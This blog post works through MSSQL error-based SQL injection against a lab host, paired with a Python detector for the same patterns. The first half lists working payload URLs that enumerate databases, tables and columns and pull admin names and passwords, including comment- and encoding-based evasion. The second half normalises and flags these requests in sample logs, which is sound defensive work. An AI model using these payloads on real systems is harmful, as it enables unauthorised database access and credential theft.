MSSQL SQL injection with only the public role

Step 1: find the database names
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name())
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(1))
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(2))
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(3))
http://192.168.152.129:85/1.aspx?xxser=1 and 1=(select db_name(4))


Step 2: table names in TestDB
http://192.168.152.129:85/1.aspx?xxser=1 and (select top 1 name from
(select top 1 name from TestDB..sysobjects where xtype=0X75 order by name) t order
by name desc)=0

Step 4: column names
http://192.168.152.129:85/1.aspx?xxser=1 having 1=1
http://192.168.152.129:85/1.aspx?xxser=1 group by admin.id  having 1=1
http://192.168.152.129:85/1.aspx?xxser=1 group by admin.id,admin.name having 1=1

Step 5: field values


/**/and/**/(select/**/top/**/1/**/isnull(cast([字段名 1]
/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 2]
/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 3]
/**/as/**/nvarchar(4000)),char(32))/**/from/**/[数据库名]
..[表名]
/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/
from/**/[数据库名]..
[表名]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1



http://192.168.152.129:85/1.aspx?xxser=1/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1
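The five steps above share a handful of fingerprints a defender can alert on: db_name() probes, reads of sysobjects, the "group by ... having 1=1" column probe, and the isnull(cast(...))/char() row-extraction pattern, all of which the last step hides behind /**/ comments and URL encoding. The following detector is an added example, not code from the original post. It undoes those two evasions and then matches each technique against constructed, IIS-style access-log lines; the log field layout, the rule names and the sample lines are all assumptions made for this example.

```python
"""Detect the MSSQL public-role injection patterns from the notes above.

Added example (not the original post's code). Input is a list of constructed
access-log lines in an assumed IIS-like layout:
    date time client-ip method uri-stem uri-query status
The query string is normalised first (URL-decoded, /**/ comments collapsed to
whitespace) so that comment-based and encoded variants match the same rules.
"""
import re
from urllib.parse import unquote

# Each rule: (name, regex applied to the normalised query string).
# The rule names are this example's own labels, not a product's.
RULES = [
    ("db_name probe", re.compile(r"\bdb_name\s*\(", re.I)),
    ("sysobjects enumeration", re.compile(r"\bsysobjects\b", re.I)),
    ("having/group-by column probe", re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)),
    ("cast/isnull row extraction", re.compile(r"\bisnull\s*\(\s*cast\s*\(", re.I)),
    ("char() string building", re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I)),
]

# Assumed log layout; the sample lines below are constructed for this example.
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<query>\S+) (?P<status>\d+)$"
)

SAMPLE_LOG = [
    "2025-11-04 14:29:01 10.0.0.5 GET /1.aspx xxser=1%20and%201=(select%20db_name(1)) 500",
    "2025-11-04 14:29:07 10.0.0.5 GET /1.aspx xxser=1%20and%20(select%20top%201%20name%20from%20TestDB..sysobjects%20where%20xtype=0X75)=0 500",
    "2025-11-04 14:29:15 10.0.0.5 GET /1.aspx xxser=1%20group%20by%20admin.id%20having%201=1 500",
    "2025-11-04 14:29:40 10.0.0.5 GET /1.aspx xxser=1/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94))>0 500",
    "2025-11-04 14:30:12 10.0.0.9 GET /1.aspx xxser=1 200",
    "2025-11-04 14:30:20 10.0.0.9 GET /index.aspx - 200",
]


def normalise(query: str) -> str:
    """URL-decode (twice, to catch double encoding) and collapse /**/ comments.

    unquote() rather than unquote_plus() is used on purpose: %2b decodes to the
    T-SQL '+' concatenation operator and must not be turned into a space.
    """
    decoded = unquote(unquote(query))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).strip()


def classify(query: str) -> list[str]:
    """Return the names of every rule that matches one raw query string."""
    text = normalise(query)
    return [name for name, rx in RULES if rx.search(text)]


def scan(lines):
    """Yield (timestamp, client ip, matched rule names) for suspicious lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("query") == "-":
            continue  # unparseable line or request without a query string
        hits = classify(m.group("query"))
        if hits:
            yield m.group("ts"), m.group("ip"), hits


if __name__ == "__main__":
    for ts, ip, hits in scan(SAMPLE_LOG):
        print(f"{ts} {ip} -> {', '.join(hits)}")
```

Running it on the constructed lines flags the four injection requests and leaves the two ordinary ones alone; the last flagged line shows that the /**/ and %2b evasions used in step 5 disappear after normalisation, so the same rules cover both the plain and the obfuscated form. Blocking on a single match is noisy; in practice a rule hit on a 500 response, or several distinct rules from one client in a short window, is the better alert condition.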

posted @ 2025-11-04 14:29  hello422000  reads(4)  comments(0)